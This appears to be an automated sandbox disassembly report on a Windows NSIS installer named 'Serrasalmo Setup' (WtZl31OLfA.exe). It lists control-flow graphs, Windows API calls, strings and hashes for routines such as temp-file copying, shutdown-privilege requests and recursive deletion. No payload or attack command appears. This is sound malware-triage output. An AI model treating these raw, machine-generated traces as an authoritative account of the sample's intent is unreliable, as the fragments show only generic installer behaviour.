403c83 ShowWindow 3527->3528 3529 403c9b 3527->3529 3528->3529 3532 403ca3 DestroyWindow 3529->3532 3533 403cbd 3529->3533 3534 40140b 2 API calls 3530->3534 3557 403e4c 3531->3557 3537 40409d 3532->3537 3538 403cc2 SetWindowLongW 3533->3538 3539 403cd3 3533->3539 3534->3523 3540 403e12 3535->3540 3537->3536 3549 4040ce ShowWindow 3537->3549 3538->3536 3542 403d7c 3539->3542 3543 403cdf GetDlgItem 3539->3543 3540->3525 3544 403e16 SendMessageW 3540->3544 3541 40409f DestroyWindow EndDialog 3541->3537 3548 40417b 8 API calls 3542->3548 3546 403cf2 SendMessageW IsWindowEnabled 3543->3546 3547 403d0f 3543->3547 3544->3536 3545 40140b 2 API calls 3545->3557 3546->3536 3546->3547 3551 403d1c 3547->3551 3554 403d63 SendMessageW 3547->3554 3555 403d2f 3547->3555 3562 403d14 3547->3562 3548->3536 3549->3536 3550 406072 18 API calls 3550->3557 3551->3554 3551->3562 3552 4040ed SendMessageW 3556 403d4a 3552->3556 3553 404114 19 API calls 3553->3557 3554->3542 3558 403d37 3555->3558 3559 403d4c 3555->3559 3556->3542 3557->3536 3557->3541 3557->3545 3557->3550 3557->3553 3564 404114 19 API calls 3557->3564 3579 403fdf DestroyWindow 3557->3579 3560 40140b 2 API calls 3558->3560 3561 40140b 2 API calls 3559->3561 3560->3562 3563 403d53 3561->3563 3562->3552 3563->3542 3563->3562 3565 403ec7 GetDlgItem 3564->3565 3566 403ee4 ShowWindow KiUserCallbackDispatcher 3565->3566 3567 403edc 3565->3567 3588 404136 KiUserCallbackDispatcher 3566->3588 3567->3566 3569 403f0e EnableWindow 3572 403f22 3569->3572 3570 403f27 GetSystemMenu EnableMenuItem SendMessageW 3571 403f57 SendMessageW 3570->3571 3570->3572 3571->3572 3572->3570 3589 404149 SendMessageW 3572->3589 3590 406050 lstrcpynW 3572->3590 3575 403f85 lstrlenW 3576 406072 18 API calls 3575->3576 3577 403f9b SetWindowTextW 3576->3577 3578 401389 2 API calls 3577->3578 3578->3557 3579->3537 3580 403ff9 CreateDialogParamW 3579->3580 3580->3537 3581 40402c 3580->3581 3582 404114 19 API calls 3581->3582 3583 404037 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3582->3583 3584 401389 2 API calls 3583->3584 3585 40407d 3584->3585 3585->3536 3586 404085 ShowWindow 3585->3586 3587 404160 SendMessageW 3586->3587 3587->3537 3588->3569 3589->3572 3590->3575

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 4032a0-4032d3 SetErrorMode GetVersion 1 4032d5-4032dd call 40642a 0->1 2 4032e6 0->2 1->2 7 4032df 1->7 4 4032eb-4032ff call 4063ba lstrlenA 2->4 9 403301-403375 call 40642a * 2 #17 OleInitialize SHGetFileInfoW call 406050 GetCommandLineW call 406050 GetModuleHandleW 4->9 7->2 18 403377-40337e 9->18 19 40337f-403399 call 405a31 CharNextW 9->19 18->19 22 4034b0-4034ca GetTempPathW call 40326f 19->22 23 40339f-4033a5 19->23 30 403522-40353c DeleteFileW call 402dee 22->30 31 4034cc-4034ea GetWindowsDirectoryW lstrcatW call 40326f 22->31 25 4033a7-4033ac 23->25 26 4033ae-4033b2 23->26 25->25 25->26 28 4033b4-4033b8 26->28 29 4033b9-4033bd 26->29 28->29 32 4033c3-4033c9 29->32 33 40347c-403489 call 405a31 29->33 51 403542-403548 30->51 52 4035ed-4035fd call 4037bf OleUninitialize 30->52 31->30 48 4034ec-40351c GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40326f 31->48 37 4033e4-40341d 32->37 38 4033cb-4033d3 32->38 49 40348b-40348c 33->49 50 40348d-403493 33->50 41 40343a-403474 37->41 42 40341f-403424 37->42 39 4033d5-4033d8 38->39 40 4033da 38->40 39->37 39->40 40->37 41->33 47 403476-40347a 41->47 42->41 46 403426-40342e 42->46 54 403430-403433 46->54 55 403435 46->55 47->33 56 40349b-4034a9 call 406050 47->56 48->30 48->52 49->50 50->23 58 403499 50->58 59 4035dd-4035e4 call 403899 51->59 60 40354e-403559 call 405a31 51->60 69 403723-403729 52->69 70 403603-403613 call 405795 ExitProcess 52->70 54->41 54->55 55->41 66 4034ae 56->66 58->66 68 4035e9 59->68 71 4035a7-4035b1 60->71 72 40355b-403590 60->72 66->22 68->52 74 4037a7-4037af 69->74 75 40372b-403741 GetCurrentProcess OpenProcessToken 69->75 79 4035b3-4035c1 call 405b0c 71->79 80 403619-40362d call 405718 lstrcatW 71->80 76 403592-403596 72->76 77 4037b1 74->77 78 4037b5-4037b9 ExitProcess 74->78 82 403743-403771 LookupPrivilegeValueW AdjustTokenPrivileges 75->82 83 403777-403785 call 40642a 75->83 84 403598-40359d 76->84 85 40359f-4035a3 76->85 77->78 79->52 95 4035c3-4035d9 call 406050 * 2 79->95 96 40363a-403654 lstrcatW lstrcmpiW 80->96 97 40362f-403635 lstrcatW 80->97 82->83 93 403793-40379e ExitWindowsEx 83->93 94 403787-403791 83->94 84->85 89 4035a5 84->89 85->76 85->89 89->71 93->74 98 4037a0-4037a2 call 40140b 93->98 94->93 94->98 95->59 96->52 100 403656-403659 96->100 97->96 98->74 104 403662 call 4056fb 100->104 105 40365b-403660 call 40567e 100->105 110 403667-403675 SetCurrentDirectoryW 104->110 105->110 112 403682-4036ab call 406050 110->112 113 403677-40367d call 406050 110->113 117 4036b0-4036cc call 406072 DeleteFileW 112->117 113->112 120 40370d-403715 117->120 121 4036ce-4036de CopyFileW 117->121 120->117 122 403717-40371e call 405ef1 120->122 121->120 123 4036e0-403700 call 405ef1 call 406072 call 405730 121->123 122->52 123->120 132 403702-403709 CloseHandle 123->132 132->120
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE ref: 004032C3
                                                                                • GetVersion.KERNEL32 ref: 004032C9
                                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032F2
                                                                                • #17.COMCTL32(00000007,00000009), ref: 00403315
                                                                                • OleInitialize.OLE32(00000000), ref: 0040331C
                                                                                • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 00403338
                                                                                • GetCommandLineW.KERNEL32(Serrasalmo Setup,NSIS Error), ref: 0040334D
                                                                                • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\WtZl31OLfA.exe",00000000), ref: 00403360
                                                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\WtZl31OLfA.exe",00000020), ref: 00403387
                                                                                  • Part of subcall function 0040642A: GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
                                                                                  • Part of subcall function 0040642A: GetProcAddress.KERNEL32(00000000,?), ref: 00406457
                                                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C1
                                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D2
                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034DE
                                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F2
                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FA
                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350B
                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403513
                                                                                • DeleteFileW.KERNELBASE(1033), ref: 00403527
                                                                                  • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Serrasalmo Setup,NSIS Error), ref: 0040605D
                                                                                • OleUninitialize.OLE32(?), ref: 004035F2
                                                                                • ExitProcess.KERNEL32 ref: 00403613
                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\WtZl31OLfA.exe",00000000,?), ref: 00403626
                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\WtZl31OLfA.exe",00000000,?), ref: 00403635
                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\WtZl31OLfA.exe",00000000,?), ref: 00403640
                                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\WtZl31OLfA.exe",00000000,?), ref: 0040364C
                                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403668
                                                                                • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,?), ref: 004036C2
                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\WtZl31OLfA.exe,0042AA08,00000001), ref: 004036D6
                                                                                • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000), ref: 00403703
                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403732
                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403739
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040374E
                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 00403771
                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403796
                                                                                • ExitProcess.KERNEL32 ref: 004037B9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                • String ID: "C:\Users\user\Desktop\WtZl31OLfA.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\neoimpressionism$C:\Users\user\AppData\Local\neoimpressionism\Vekselformular$C:\Users\user\Desktop$C:\Users\user\Desktop\WtZl31OLfA.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$Serrasalmo Setup$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                • API String ID: 2488574733-2835043443
                                                                                • Opcode ID: fc8eb4e9295a56fa763b8fe068141a7f293ab7297275d67af1f56c49d905d95f
                                                                                • Instruction ID: bc0dc6ca93ec9440221f6a1154d69e62cad873230aa3e7f423b6c7eed9202452
                                                                                • Opcode Fuzzy Hash: fc8eb4e9295a56fa763b8fe068141a7f293ab7297275d67af1f56c49d905d95f
                                                                                • Instruction Fuzzy Hash: 60D1F470600300ABE710BF759D45B2B3AADEB8074AF51443FF581B62E1DB7D8A458B6E

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 133 4052ee-405309 134 405498-40549f 133->134 135 40530f-4053d6 GetDlgItem * 3 call 404149 call 404a4c GetClientRect GetSystemMetrics SendMessageW * 2 133->135 137 4054a1-4054c3 GetDlgItem CreateThread CloseHandle 134->137 138 4054c9-4054d6 134->138 155 4053f4-4053f7 135->155 156 4053d8-4053f2 SendMessageW * 2 135->156 137->138 140 4054f4-4054fe 138->140 141 4054d8-4054de 138->141 145 405500-405506 140->145 146 405554-405558 140->146 143 4054e0-4054ef ShowWindow * 2 call 404149 141->143 144 405519-405522 call 40417b 141->144 143->140 159 405527-40552b 144->159 150 405508-405514 call 4040ed 145->150 151 40552e-40553e ShowWindow 145->151 146->144 148 40555a-405560 146->148 148->144 157 405562-405575 SendMessageW 148->157 150->144 153 405540-405549 call 4051af 151->153 154 40554e-40554f call 4040ed 151->154 153->154 154->146 162 405407-40541e call 404114 155->162 163 4053f9-405405 SendMessageW 155->163 156->155 164 405677-405679 157->164 165 40557b-4055a6 CreatePopupMenu call 406072 AppendMenuW 157->165 172 405420-405434 ShowWindow 162->172 173 405454-405475 GetDlgItem SendMessageW 162->173 163->162 164->159 170 4055a8-4055b8 GetWindowRect 165->170 171 4055bb-4055d0 TrackPopupMenu 165->171 170->171 171->164 175 4055d6-4055ed 171->175 176 405443 172->176 177 405436-405441 ShowWindow 172->177 173->164 174 40547b-405493 SendMessageW * 2 173->174 174->164 178 4055f2-40560d SendMessageW 175->178 179 405449-40544f call 404149 176->179 177->179 178->178 180 40560f-405632 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 178->180 179->173 182 405634-40565b SendMessageW 180->182 182->182 183 40565d-405671 GlobalUnlock SetClipboardData CloseClipboard 182->183 183->164
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,00000403), ref: 0040534C
                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040535B
                                                                                • GetClientRect.USER32(?,?), ref: 00405398
                                                                                • GetSystemMetrics.USER32(00000002), ref: 0040539F
                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C0
                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D1
                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E4
                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F2
                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405405
                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405427
                                                                                • ShowWindow.USER32(?,00000008), ref: 0040543B
                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040545C
                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040546C
                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405485
                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405491
                                                                                • GetDlgItem.USER32(?,000003F8), ref: 0040536A
                                                                                  • Part of subcall function 00404149: SendMessageW.USER32(00000028,?,00000001,00403F75), ref: 00404157
                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004054AE
                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005282,00000000), ref: 004054BC
                                                                                • CloseHandle.KERNELBASE(00000000), ref: 004054C3
                                                                                • ShowWindow.USER32(00000000), ref: 004054E7
                                                                                • ShowWindow.USER32(0001045E,00000008), ref: 004054EC
                                                                                • ShowWindow.USER32(00000008), ref: 00405536
                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556A
                                                                                • CreatePopupMenu.USER32 ref: 0040557B
                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040558F
                                                                                • GetWindowRect.USER32(?,?), ref: 004055AF
                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055C8
                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405600
                                                                                • OpenClipboard.USER32(00000000), ref: 00405610
                                                                                • EmptyClipboard.USER32 ref: 00405616
                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405622
                                                                                • GlobalLock.KERNEL32(00000000), ref: 0040562C
                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405640
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405660
                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 0040566B
                                                                                • CloseClipboard.USER32 ref: 00405671
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                • String ID: {
                                                                                • API String ID: 590372296-366298937
                                                                                • Opcode ID: 37368ef33480fb737561e727008f589c68c636835f40b94f7f78e68fc6a36340
                                                                                • Instruction ID: 691c8e7aa241a152ccc1fa1da29986a8db7386483fecbbc97dabe6f77f48909a
                                                                                • Opcode Fuzzy Hash: 37368ef33480fb737561e727008f589c68c636835f40b94f7f78e68fc6a36340
                                                                                • Instruction Fuzzy Hash: D4B14971800608BFDB119FA0DD89EAE7B79FB48355F00803AFA41BA1A0CB755E51DF68

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 428 406072-40607d 429 406090-4060a6 428->429 430 40607f-40608e 428->430 431 4060ac-4060b9 429->431 432 4062be-4062c4 429->432 430->429 431->432 435 4060bf-4060c6 431->435 433 4062ca-4062d5 432->433 434 4060cb-4060d8 432->434 436 4062e0-4062e1 433->436 437 4062d7-4062db call 406050 433->437 434->433 438 4060de-4060ea 434->438 435->432 437->436 440 4060f0-40612c 438->440 441 4062ab 438->441 442 406132-40613d GetVersion 440->442 443 40624c-406250 440->443 444 4062b9-4062bc 441->444 445 4062ad-4062b7 441->445 448 406157 442->448 449 40613f-406143 442->449 446 406252-406256 443->446 447 406285-406289 443->447 444->432 445->432 451 406266-406273 call 406050 446->451 452 406258-406264 call 405f97 446->452 454 406298-4062a9 lstrlenW 447->454 455 40628b-406293 call 406072 447->455 453 40615e-406165 448->453 449->448 450 406145-406149 449->450 450->448 456 40614b-40614f 450->456 466 406278-406281 451->466 452->466 458 406167-406169 453->458 459 40616a-40616c 453->459 454->432 455->454 456->448 462 406151-406155 456->462 458->459 464 4061a8-4061ab 459->464 465 40616e-40618b call 405f1d 459->465 462->453 469 4061bb-4061be 464->469 470 4061ad-4061b9 GetSystemDirectoryW 464->470 473 406190-406194 465->473 466->454 468 406283 466->468 474 406244-40624a call 4062e4 468->474 471 4061c0-4061ce GetWindowsDirectoryW 469->471 472 406229-40622b 469->472 475 40622d-406231 470->475 471->472 472->475 476 4061d0-4061da 472->476 477 406233-406237 473->477 478 40619a-4061a3 call 406072 473->478 474->454 475->474 475->477 480 4061f4-40620a SHGetSpecialFolderLocation 476->480 481 4061dc-4061df 476->481 477->474 483 406239-40623f lstrcatW 477->483 478->475 486 406225 480->486 487 40620c-406223 SHGetPathFromIDListW CoTaskMemFree 480->487 481->480 485 4061e1-4061e8 481->485 483->474 489 4061f0-4061f2 485->489 486->472 487->475 487->486 489->475 489->480
                                                                                APIs
                                                                                • GetVersion.KERNEL32(00000000,Completed,?,004051E6,Completed,00000000,00000000,0041C400), ref: 00406135
                                                                                • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004061B3
                                                                                • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 004061C6
                                                                                • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406202
                                                                                • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00406210
                                                                                • CoTaskMemFree.OLE32(?), ref: 0040621B
                                                                                • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040623F
                                                                                • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004051E6,Completed,00000000,00000000,0041C400), ref: 00406299
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                • API String ID: 900638850-905382516
                                                                                • Opcode ID: 77a03850bddf5695e6b0b32a6855accced49c5eafe9b7dc377c0e735c0fbd350
                                                                                • Instruction ID: 6a0e75f8176bdfaa808a817e977aa907b1c5d4b6119349843486ba00336cef2a
                                                                                • Opcode Fuzzy Hash: 77a03850bddf5695e6b0b32a6855accced49c5eafe9b7dc377c0e735c0fbd350
                                                                                • Instruction Fuzzy Hash: 45611E71A00105ABDF20AF65CC41AEE37A5EF45314F12817FE852BA2D0D73D8AA1CB4D

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 490 405841-405867 call 405b0c 493 405880-405887 490->493 494 405869-40587b DeleteFileW 490->494 496 405889-40588b 493->496 497 40589a-4058aa call 406050 493->497 495 4059fd-405a01 494->495 498 405891-405894 496->498 499 4059ab-4059b0 496->499 505 4058b9-4058ba call 405a50 497->505 506 4058ac-4058b7 lstrcatW 497->506 498->497 498->499 499->495 501 4059b2-4059b5 499->501 503 4059b7-4059bd 501->503 504 4059bf-4059c7 call 406393 501->504 503->495 504->495 514 4059c9-4059dd call 405a04 call 4057f9 504->514 507 4058bf-4058c3 505->507 506->507 510 4058c5-4058cd 507->510 511 4058cf-4058d5 lstrcatW 507->511 510->511 513 4058da-4058f6 lstrlenW FindFirstFileW 510->513 511->513 515 4059a0-4059a4 513->515 516 4058fc-405904 513->516 530 4059f5-4059f8 call 4051af 514->530 531 4059df-4059e2 514->531 515->499 518 4059a6 515->518 519 405924-405938 call 406050 516->519 520 405906-40590e 516->520 518->499 532 40593a-405942 519->532 533 40594f-40595a call 4057f9 519->533 522 405910-405918 520->522 523 405983-405993 FindNextFileW 520->523 522->519 526 40591a-405922 522->526 523->516 529 405999-40599a FindClose 523->529 526->519 526->523 529->515 530->495 531->503 536 4059e4-4059f3 call 4051af call 405ef1 531->536 532->523 537 405944-40594d call 405841 532->537 542 40597b-40597e call 4051af 533->542 543 40595c-40595f 533->543 536->495 537->523 542->523 546 405961-405971 call 4051af call 405ef1 543->546 547 405973-405979 543->547 546->523 547->523
                                                                                APIs
                                                                                • DeleteFileW.KERNELBASE(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040586A
                                                                                • lstrcatW.KERNEL32(0042F250,\*.*,0042F250,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B2
                                                                                • lstrcatW.KERNEL32(?,0040A014,?,0042F250,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058D5
                                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058DB
                                                                                • FindFirstFileW.KERNEL32(0042F250,?,?,?,0040A014,?,0042F250,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058EB
                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040598B
                                                                                • FindClose.KERNEL32(00000000), ref: 0040599A
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040584E
                                                                                • \*.*, xrefs: 004058AC
                                                                                • "C:\Users\user\Desktop\WtZl31OLfA.exe", xrefs: 00405841
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                • String ID: "C:\Users\user\Desktop\WtZl31OLfA.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                • API String ID: 2035342205-3831545218
                                                                                • Opcode ID: 310f22d1e18abc7c3bbe2dee3bc3119d14cc0d79031cc9c47b9afefb4b25f888
                                                                                • Instruction ID: caf420165dc21d0a99f0983ed575dd8be70d76c6b9b5ff92ec706b465e099e4b
                                                                                • Opcode Fuzzy Hash: 310f22d1e18abc7c3bbe2dee3bc3119d14cc0d79031cc9c47b9afefb4b25f888
                                                                                • Instruction Fuzzy Hash: DB41B171800A14EADB21AB65CD49BBF7678EF85764F10423BF801B11D1D77C4A82DE6E
                                                                                APIs
                                                                                • FindFirstFileW.KERNELBASE(75923420,00430298,0042FA50,00405B55,0042FA50,0042FA50,00000000,0042FA50,0042FA50,75923420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 0040639E
                                                                                • FindClose.KERNEL32(00000000), ref: 004063AA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
